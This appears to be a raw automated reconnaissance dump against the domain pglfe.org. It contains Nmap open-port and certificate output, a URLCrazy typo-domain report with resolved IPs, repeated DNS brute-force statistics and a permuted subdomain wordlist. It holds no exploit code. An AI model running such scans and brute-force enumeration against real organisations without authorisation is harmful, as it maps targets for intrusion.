900 Is Active: True (reset ttl 64)
901 Port: 21/tcp open tcpwrapped syn-ack ttl 48
902 Port: 80/tcp open tcpwrapped syn-ack ttl 48
903 Port: 110/tcp open tcpwrapped syn-ack ttl 48
904 Port: 143/tcp open tcpwrapped syn-ack ttl 48
905 Port: 443/tcp open tcpwrapped syn-ack ttl 48
906 Script Info: | http-methods:
907 Script Info: |_ Supported Methods: OPTIONS
908 Script Info: | ssl-cert: Subject: commonName=catchall-server-default.server279.com
909 Script Info: | Subject Alternative Name: DNS:catchall-server-default.server279.com
910 Script Info: | Issuer: commonName=Let's Encrypt Authority X3/organizationName=Let's Encrypt/countryName=US
911 Script Info: | Public Key type: rsa
912 Script Info: | Public Key bits: 2048
913 Script Info: | Signature Algorithm: sha256WithRSAEncryption
914 Script Info: | Not valid before: 2019-09-22T05:35:30
915 Script Info: | Not valid after: 2019-12-21T05:35:30
916 Script Info: | MD5: 86ba 32ce 10d9 9b41 24c6 d62e b4cf 9165
917 Script Info: |_SHA-1: c361 8d67 90d9 a186 8f9e 0c29 5409 e82b 9257 38a2
918 Port: 587/tcp open tcpwrapped syn-ack ttl 48
919 Script Info: |_smtp-commands: Couldn't establish connection on port 587
920 Port: 993/tcp open tcpwrapped syn-ack ttl 48
921 Port: 995/tcp open tcpwrapped syn-ack ttl 48
922 Port: 3306/tcp open tcpwrapped syn-ack ttl 48
923
924--------------End Summary --------------
925-----------------------------------------
926#######################################################################################################################################
927URLCrazy Domain Report
928Domain : www.pglfe.org
929Keyboard : qwerty
930At : 2019-11-25 08:04:14 -0500
931
932# Please wait. 116 hostnames to process
933
934Typo Type Typo DNS-A CC-A DNS-MX Extn
935---------------------------------------------------------------------------------------------------------
936Character Omission ww.pglfe.org 192.252.144.58 org
937Character Omission www.glfe.org 134.0.9.8 CH,SWITZERLAND org
938Character Omission www.pgfe.org ? org
939Character Omission www.pgle.org 176.32.230.23 GB,UNITED KINGDOM org
940Character Omission www.pglf.org 45.55.83.166 org
941Character Omission www.plfe.org ? org
942Character Omission wwwpglfe.org ? org
943Character Repeat www.pgglfe.org ? org
944Character Repeat www.pglfee.org ? org
945Character Repeat www.pglffe.org ? org
946Character Repeat www.pgllfe.org ? org
947Character Repeat www.ppglfe.org ? org
948Character Repeat wwww.pglfe.org 192.252.144.58 org
949Character Swap ww.wpglfe.org ? org
950Character Swap www.gplfe.org ? org
951Character Swap www.pgfle.org ? org
952Character Swap www.pglef.org ? org
953Character Swap www.plgfe.org ? org
954Character Swap wwwp.glfe.org 134.0.9.8 ES,SPAIN mail.glfe.org org
955Character Replacement eww.pglfe.org 192.252.144.58 org
956Character Replacement qww.pglfe.org 192.252.144.58 org
957Character Replacement wew.pglfe.org 192.252.144.58 org
958Character Replacement wqw.pglfe.org 192.252.144.58 org
959Character Replacement wwe.pglfe.org 192.252.144.58 org
960Character Replacement wwq.pglfe.org 192.252.144.58 org
961Character Replacement www.oglfe.org ? org
962Character Replacement www.pflfe.org ? org
963Character Replacement www.pgkfe.org ? org
964Character Replacement www.pglde.org ? org
965Character Replacement www.pglfr.org ? org
966Character Replacement www.pglfw.org ? org
967Character Replacement www.pglge.org ? org
968Character Replacement www.phlfe.org ? org
969Double Character Replacement eew.pglfe.org 192.252.144.58 org
970Double Character Replacement qqw.pglfe.org 192.252.144.58 org
971Double Character Replacement wee.pglfe.org 192.252.144.58 org
972Double Character Replacement wqq.pglfe.org 192.252.144.58 org
973Character Insertion weww.pglfe.org 192.252.144.58 org
974Character Insertion wqww.pglfe.org 192.252.144.58 org
975Character Insertion wwew.pglfe.org 192.252.144.58 org
976Character Insertion wwqw.pglfe.org 192.252.144.58 org
977Character Insertion www.pgflfe.org ? org
978Character Insertion www.pghlfe.org ? org
979Character Insertion www.pglfde.org ? org
980Character Insertion www.pglfer.org ? org
981Character Insertion www.pglfew.org ? org
982Character Insertion www.pglfge.org ? org
983Character Insertion www.pglkfe.org ? org
984Character Insertion www.poglfe.org ? org
985Character Insertion wwwe.pglfe.org 192.252.144.58 org
986Character Insertion wwwq.pglfe.org 192.252.144.58 org
987Missing Dot wwwwww.pglfe.org 192.252.144.58 org
988Singular or Pluralise pglfe.org 192.252.144.58 mail.pglfe.org org
989Singular or Pluralise pglves.org ? org
990Vowel Swap www.pglfa.org ? org
991Vowel Swap www.pglfi.org ? org
992Vowel Swap www.pglfo.org ? org
993Vowel Swap www.pglfu.org ? org
994Bit Flipping 7ww.pglfe.org 192.252.144.58 org
995Bit Flipping gww.pglfe.org 192.252.144.58 org
996Bit Flipping sww.pglfe.org 192.252.144.58 org
997Bit Flipping uww.pglfe.org 192.252.144.58 org
998Bit Flipping vww.pglfe.org 192.252.144.58 org
999Bit Flipping w7w.pglfe.org 192.252.144.58 org
1000Bit Flipping wgw.pglfe.org 192.252.144.58 org
1001Bit Flipping wsw.pglfe.org 192.252.144.58 org
1002Bit Flipping wuw.pglfe.org 192.252.144.58 org
1003Bit Flipping wvw.pglfe.org 192.252.144.58 org
1004Bit Flipping ww7.pglfe.org 192.252.144.58 org
1005Bit Flipping wwg.pglfe.org 192.252.144.58 org
1006Bit Flipping wws.pglfe.org 192.252.144.58 org
1007Bit Flipping wwu.pglfe.org 192.252.144.58 org
1008Bit Flipping wwv.pglfe.org 192.252.144.58 org
1009Bit Flipping www.0glfe.org ? org
1010Bit Flipping www.pclfe.org ? org
1011Bit Flipping www.pelfe.org ? org
1012Bit Flipping www.pgdfe.org ? org
1013Bit Flipping www.pghfe.org ? org
1014Bit Flipping www.pglbe.org ? org
1015Bit Flipping www.pglfd.org ? org
1016Bit Flipping www.pglfg.org ? org
1017Bit Flipping www.pglfm.org ? org
1018Bit Flipping www.pglne.org ? org
1019Bit Flipping www.pglve.org ? org
1020Bit Flipping www.pgmfe.org ? org
1021Bit Flipping www.pgnfe.org ? org
1022Bit Flipping www.polfe.org ? org
1023Bit Flipping www.pwlfe.org ? org
1024Bit Flipping www.qglfe.org ? org
1025Bit Flipping www.rglfe.org ? org
1026Bit Flipping www.tglfe.org ? org
1027Bit Flipping www.xglfe.org ? org
1028Bit Flipping wwwnpglfe.org ? org
1029Homoglyphs vvvvvv.pglfe.org 192.252.144.58 org
1030Homoglyphs vvvvw.pglfe.org 192.252.144.58 org
1031Homoglyphs vvwvv.pglfe.org 192.252.144.58 org
1032Homoglyphs vvww.pglfe.org 192.252.144.58 org
1033Homoglyphs wvvvv.pglfe.org 192.252.144.58 org
1034Homoglyphs wvvw.pglfe.org 192.252.144.58 org
1035Homoglyphs wwvv.pglfe.org 192.252.144.58 org
1036Homoglyphs www.pg1fe.org ? org
1037Wrong TLD pglfe.ca ? ca
1038Wrong TLD pglfe.ch ? ch
1039Wrong TLD pglfe.com ? com
1040Wrong TLD pglfe.de ? de
1041Wrong TLD pglfe.edu ? edu
1042Wrong TLD pglfe.es ? es
1043Wrong TLD pglfe.fr ? fr
1044Wrong TLD pglfe.it ? it
1045Wrong TLD pglfe.jp ? jp
1046Wrong TLD pglfe.net ? net
1047Wrong TLD pglfe.nl ? nl
1048Wrong TLD pglfe.no ? no
1049Wrong TLD pglfe.ru ? ru
1050Wrong TLD pglfe.se ? se
1051Wrong TLD pglfe.us ? us
1052#######################################################################################################################################
1053Privileges have been dropped to "nobody:nogroup" for security reasons.
1054
1310Processed queries: 1919
1311Received packets: 3175
1312Progress: 100.00% (00 h 00 min 15 sec / 00 h 00 min 15 sec)
1313Current incoming rate: 1 pps, average: 211 pps
1314Current success rate: 0 pps, average: 127 pps
1315Finished total: 1918, success: 1918 (100.00%)
1316Mismatched domains: 474 (15.04%), IDs: 0 (0.00%)
1317Failures: 0: 28.15%, 1: 32.95%, 2: 18.20%, 3: 9.02%, 4: 5.11%, 5: 3.44%, 6: 1.56%, 7: 0.63%, 8: 0.36%, 9: 0.36%, 10: 0.05%, 11: 0.16%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.05%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1318Response: | Success: | Total:
1319OK: | 1652 ( 86.13%) | 1976 ( 62.69%)
1320NXDOMAIN: | 216 ( 11.26%) | 234 ( 7.42%)
1321SERVFAIL: | 50 ( 2.61%) | 68 ( 2.16%)
1322REFUSED: | 0 ( 0.00%) | 872 ( 27.66%)
1323FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1324
1325
1326
1327Processed queries: 1919
1328Received packets: 3179
1329Progress: 100.00% (00 h 00 min 16 sec / 00 h 00 min 16 sec)
1330Current incoming rate: 3 pps, average: 198 pps
1331Current success rate: 0 pps, average: 119 pps
1332Finished total: 1918, success: 1918 (100.00%)
1333Mismatched domains: 478 (15.15%), IDs: 0 (0.00%)
1334Failures: 0: 28.15%, 1: 32.95%, 2: 18.20%, 3: 9.02%, 4: 5.11%, 5: 3.44%, 6: 1.56%, 7: 0.63%, 8: 0.36%, 9: 0.36%, 10: 0.05%, 11: 0.16%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.05%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1335Response: | Success: | Total:
1336OK: | 1652 ( 86.13%) | 1978 ( 62.67%)
1337NXDOMAIN: | 216 ( 11.26%) | 234 ( 7.41%)
1338SERVFAIL: | 50 ( 2.61%) | 68 ( 2.15%)
1339REFUSED: | 0 ( 0.00%) | 874 ( 27.69%)
1340FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1341
1342
1343
1344Processed queries: 1919
1345Received packets: 3182
1346Progress: 100.00% (00 h 00 min 17 sec / 00 h 00 min 17 sec)
1347Current incoming rate: 2 pps, average: 186 pps
1348Current success rate: 0 pps, average: 112 pps
1349Finished total: 1918, success: 1918 (100.00%)
1350Mismatched domains: 481 (15.23%), IDs: 0 (0.00%)
1351Failures: 0: 28.15%, 1: 32.95%, 2: 18.20%, 3: 9.02%, 4: 5.11%, 5: 3.44%, 6: 1.56%, 7: 0.63%, 8: 0.36%, 9: 0.36%, 10: 0.05%, 11: 0.16%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.05%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1352Response: | Success: | Total:
1353OK: | 1652 ( 86.13%) | 1978 ( 62.61%)
1354NXDOMAIN: | 216 ( 11.26%) | 234 ( 7.41%)
1355SERVFAIL: | 50 ( 2.61%) | 69 ( 2.18%)
1356REFUSED: | 0 ( 0.00%) | 875 ( 27.70%)
1357FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1358
1359
1360
1361Processed queries: 1919
1362Received packets: 3183
1363Progress: 100.00% (00 h 00 min 18 sec / 00 h 00 min 18 sec)
1364Current incoming rate: 0 pps, average: 176 pps
1365Current success rate: 0 pps, average: 106 pps
1366Finished total: 1918, success: 1918 (100.00%)
1367Mismatched domains: 482 (15.25%), IDs: 0 (0.00%)
1368Failures: 0: 28.15%, 1: 32.95%, 2: 18.20%, 3: 9.02%, 4: 5.11%, 5: 3.44%, 6: 1.56%, 7: 0.63%, 8: 0.36%, 9: 0.36%, 10: 0.05%, 11: 0.16%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.05%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1369Response: | Success: | Total:
1370OK: | 1652 ( 86.13%) | 1978 ( 62.59%)
1371NXDOMAIN: | 216 ( 11.26%) | 234 ( 7.41%)
1372SERVFAIL: | 50 ( 2.61%) | 69 ( 2.18%)
1373REFUSED: | 0 ( 0.00%) | 876 ( 27.72%)
1374FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1375
1376
1377
1378Processed queries: 1919
1379Received packets: 3184
1380Progress: 100.00% (00 h 00 min 19 sec / 00 h 00 min 19 sec)
1381Current incoming rate: 0 pps, average: 167 pps
1382Current success rate: 0 pps, average: 100 pps
1383Finished total: 1918, success: 1918 (100.00%)
1384Mismatched domains: 483 (15.28%), IDs: 0 (0.00%)
1385Failures: 0: 28.15%, 1: 32.95%, 2: 18.20%, 3: 9.02%, 4: 5.11%, 5: 3.44%, 6: 1.56%, 7: 0.63%, 8: 0.36%, 9: 0.36%, 10: 0.05%, 11: 0.16%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.05%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1386Response: | Success: | Total:
1387OK: | 1652 ( 86.13%) | 1978 ( 62.58%)
1388NXDOMAIN: | 216 ( 11.26%) | 234 ( 7.40%)
1389SERVFAIL: | 50 ( 2.61%) | 69 ( 2.18%)
1390REFUSED: | 0 ( 0.00%) | 877 ( 27.74%)
1391FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1392
1393
1394
1395Processed queries: 1919
1396Received packets: 3187
1397Progress: 100.00% (00 h 00 min 20 sec / 00 h 00 min 20 sec)
1398Current incoming rate: 2 pps, average: 159 pps
1399Current success rate: 0 pps, average: 95 pps
1400Finished total: 1918, success: 1918 (100.00%)
1401Mismatched domains: 486 (15.36%), IDs: 0 (0.00%)
1402Failures: 0: 28.15%, 1: 32.95%, 2: 18.20%, 3: 9.02%, 4: 5.11%, 5: 3.44%, 6: 1.56%, 7: 0.63%, 8: 0.36%, 9: 0.36%, 10: 0.05%, 11: 0.16%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.05%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1403Response: | Success: | Total:
1404OK: | 1652 ( 86.13%) | 1978 ( 62.52%)
1405NXDOMAIN: | 216 ( 11.26%) | 234 ( 7.40%)
1406SERVFAIL: | 50 ( 2.61%) | 72 ( 2.28%)
1407REFUSED: | 0 ( 0.00%) | 877 ( 27.72%)
1408FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1409
1410
1411
1412Processed queries: 1919
1413Received packets: 3189
1414Progress: 100.00% (00 h 00 min 21 sec / 00 h 00 min 21 sec)
1415Current incoming rate: 1 pps, average: 151 pps
1416Current success rate: 0 pps, average: 91 pps
1417Finished total: 1918, success: 1918 (100.00%)
1418Mismatched domains: 488 (15.41%), IDs: 0 (0.00%)
1419Failures: 0: 28.15%, 1: 32.95%, 2: 18.20%, 3: 9.02%, 4: 5.11%, 5: 3.44%, 6: 1.56%, 7: 0.63%, 8: 0.36%, 9: 0.36%, 10: 0.05%, 11: 0.16%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.05%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1420Response: | Success: | Total:
1421OK: | 1652 ( 86.13%) | 1978 ( 62.48%)
1422NXDOMAIN: | 216 ( 11.26%) | 234 ( 7.39%)
1423SERVFAIL: | 50 ( 2.61%) | 72 ( 2.27%)
1424REFUSED: | 0 ( 0.00%) | 879 ( 27.76%)
1425FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1426
1427
1428
1429Processed queries: 1919
1430Received packets: 3190
1431Progress: 100.00% (00 h 00 min 22 sec / 00 h 00 min 22 sec)
1432Current incoming rate: 0 pps, average: 144 pps
1433Current success rate: 0 pps, average: 87 pps
1434Finished total: 1918, success: 1918 (100.00%)
1435Mismatched domains: 489 (15.44%), IDs: 0 (0.00%)
1436Failures: 0: 28.15%, 1: 32.95%, 2: 18.20%, 3: 9.02%, 4: 5.11%, 5: 3.44%, 6: 1.56%, 7: 0.63%, 8: 0.36%, 9: 0.36%, 10: 0.05%, 11: 0.16%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.05%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1437Response: | Success: | Total:
1438OK: | 1652 ( 86.13%) | 1978 ( 62.46%)
1439NXDOMAIN: | 216 ( 11.26%) | 234 ( 7.39%)
1440SERVFAIL: | 50 ( 2.61%) | 72 ( 2.27%)
1441REFUSED: | 0 ( 0.00%) | 880 ( 27.79%)
1442FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1443
1444
1445
1446Processed queries: 1919
1447Received packets: 3195
1448Progress: 100.00% (00 h 00 min 23 sec / 00 h 00 min 23 sec)
1449Current incoming rate: 4 pps, average: 138 pps
1450Current success rate: 0 pps, average: 83 pps
1451Finished total: 1918, success: 1918 (100.00%)
1452Mismatched domains: 494 (15.57%), IDs: 0 (0.00%)
1453Failures: 0: 28.15%, 1: 32.95%, 2: 18.20%, 3: 9.02%, 4: 5.11%, 5: 3.44%, 6: 1.56%, 7: 0.63%, 8: 0.36%, 9: 0.36%, 10: 0.05%, 11: 0.16%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.05%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1454Response: | Success: | Total:
1455OK: | 1652 ( 86.13%) | 1979 ( 62.39%)
1456NXDOMAIN: | 216 ( 11.26%) | 236 ( 7.44%)
1457SERVFAIL: | 50 ( 2.61%) | 72 ( 2.27%)
1458REFUSED: | 0 ( 0.00%) | 882 ( 27.81%)
1459FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1460
1461
1462
1463Processed queries: 1919
1464Received packets: 3199
1465Progress: 100.00% (00 h 00 min 24 sec / 00 h 00 min 24 sec)
1466Current incoming rate: 3 pps, average: 133 pps
1467Current success rate: 0 pps, average: 79 pps
1468Finished total: 1918, success: 1918 (100.00%)
1469Mismatched domains: 498 (15.68%), IDs: 0 (0.00%)
1470Failures: 0: 28.15%, 1: 32.95%, 2: 18.20%, 3: 9.02%, 4: 5.11%, 5: 3.44%, 6: 1.56%, 7: 0.63%, 8: 0.36%, 9: 0.36%, 10: 0.05%, 11: 0.16%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.05%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1471Response: | Success: | Total:
1472OK: | 1652 ( 86.13%) | 1982 ( 62.41%)
1473NXDOMAIN: | 216 ( 11.26%) | 236 ( 7.43%)
1474SERVFAIL: | 50 ( 2.61%) | 72 ( 2.27%)
1475REFUSED: | 0 ( 0.00%) | 883 ( 27.80%)
1476FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1477
1478
1479
1480Processed queries: 1919
1481Received packets: 3201
1482Progress: 100.00% (00 h 00 min 25 sec / 00 h 00 min 25 sec)
1483Current incoming rate: 1 pps, average: 127 pps
1484Current success rate: 0 pps, average: 76 pps
1485Finished total: 1918, success: 1918 (100.00%)
1486Mismatched domains: 500 (15.73%), IDs: 0 (0.00%)
1487Failures: 0: 28.15%, 1: 32.95%, 2: 18.20%, 3: 9.02%, 4: 5.11%, 5: 3.44%, 6: 1.56%, 7: 0.63%, 8: 0.36%, 9: 0.36%, 10: 0.05%, 11: 0.16%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.05%, 50: 0.00%,
1488Response: | Success: | Total:
1489OK: | 1652 ( 86.13%) | 1983 ( 62.40%)
1490NXDOMAIN: | 216 ( 11.26%) | 236 ( 7.43%)
1491SERVFAIL: | 50 ( 2.61%) | 72 ( 2.27%)
1492REFUSED: | 0 ( 0.00%) | 884 ( 27.82%)
1493FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1494
1495
1496

Processed queries: 1919
Received packets: 3202
Progress: 100.00% (00 h 00 min 25 sec / 00 h 00 min 25 sec)
Current incoming rate: 16 pps, average: 127 pps
Current success rate: 0 pps, average: 76 pps
Finished total: 1919, success: 1918 (99.95%)
Mismatched domains: 501 (15.76%), IDs: 0 (0.00%)
Failures: 0: 28.14%, 1: 32.93%, 2: 18.19%, 3: 9.02%, 4: 5.11%, 5: 3.44%, 6: 1.56%, 7: 0.63%, 8: 0.36%, 9: 0.36%, 10: 0.05%, 11: 0.16%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.05%,
Response: | Success: | Total:
OK: | 1652 ( 86.13%) | 1983 ( 62.38%)
NXDOMAIN: | 216 ( 11.26%) | 236 ( 7.42%)
SERVFAIL: | 50 ( 2.61%) | 72 ( 2.26%)
REFUSED: | 0 ( 0.00%) | 885 ( 27.84%)
FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
2318www8.pglfe.org
2319www-9.pglfe.org
2320www.9.pglfe.org
2321www9.pglfe.org
2322www-accept.pglfe.org
2323www.accept.pglfe.org
2324wwwaccept.pglfe.org
2325www-accounting.pglfe.org
2326www.accounting.pglfe.org
2327wwwaccounting.pglfe.org
2328www-account.pglfe.org
2329www.account.pglfe.org
2330wwwaccount.pglfe.org
2331www.accounts.pglfe.org
2332wwwaccounts.pglfe.org
2333www-acc.pglfe.org
2334www.acc.pglfe.org
2335wwwacc.pglfe.org
2336www-admin1.pglfe.org
2337www.admin1.pglfe.org
2338wwwadmin1.pglfe.org
2339www-administrator.pglfe.org
2340www.administrator.pglfe.org
2341www-administrators.pglfe.org
2342www.administrators.pglfe.org
2343wwwadministrators.pglfe.org
2344www-admin.pglfe.org
2345www.admin.pglfe.org
2346wwwadmin.pglfe.org
2347www-admins.pglfe.org
2348www.admins.pglfe.org
2349wwwadmins.pglfe.org
2350www-adm.pglfe.org
2351www.adm.pglfe.org
2352wwwadm.pglfe.org
2353www-akali.pglfe.org
2354www.akali.pglfe.org
2355wwwakali.pglfe.org
2356www-akamai.pglfe.org
2357wwwakamai.pglfe.org
2358www-alpha.pglfe.org
2359www.alpha.pglfe.org
2360wwwalpha.pglfe.org
2361www-alt.pglfe.org
2362www.alt.pglfe.org
2363wwwalt.pglfe.org
2364www-america.pglfe.org
2365www.america.pglfe.org
2366wwwamerica.pglfe.org
2367www-analytics.pglfe.org
2368www.analytics.pglfe.org
2369www-apache.pglfe.org
2370www.apache.pglfe.org
2371wwwapache.pglfe.org
2372www-apac.pglfe.org
2373www.apac.pglfe.org
2374wwwapac.pglfe.org
2375www-a.pglfe.org
2376www.a.pglfe.org
2377wwwa.pglfe.org
2378www-api1.pglfe.org
2379www.api1.pglfe.org
2380www-api-docs.pglfe.org
2381wwwapi-docs.pglfe.org
2382www-api.pglfe.org
2383www.api.pglfe.org
2384wwwapi.pglfe.org
2385www-apollo.pglfe.org
2386www.apollo.pglfe.org
2387wwwapollo.pglfe.org
2388www-application.pglfe.org
2389wwwapplication.pglfe.org
2390www-app.pglfe.org
2391wwwapp.pglfe.org
2392www-april.pglfe.org
2393www.april.pglfe.org
2394wwwapril.pglfe.org
2395www-auth.pglfe.org
2396www.auth.pglfe.org
2397wwwauth.pglfe.org
2398www-aws.pglfe.org
2399www.aws.pglfe.org
2400wwwaws.pglfe.org
2401www-azure.pglfe.org
2402www.azure.pglfe.org
2403www-backend.pglfe.org
2404www.backend.pglfe.org
2405wwwbackend.pglfe.org
2406www-beta.pglfe.org
2407www.beta.pglfe.org
2408wwwbeta.pglfe.org
2409www-billing.pglfe.org
2410www.billing.pglfe.org
2411wwwbilling.pglfe.org
2412www.boards.pglfe.org
2413wwwboards.pglfe.org
2414www-box.pglfe.org
2415www.box.pglfe.org
2416wwwbox.pglfe.org
2417www-b.pglfe.org
2418www.b.pglfe.org
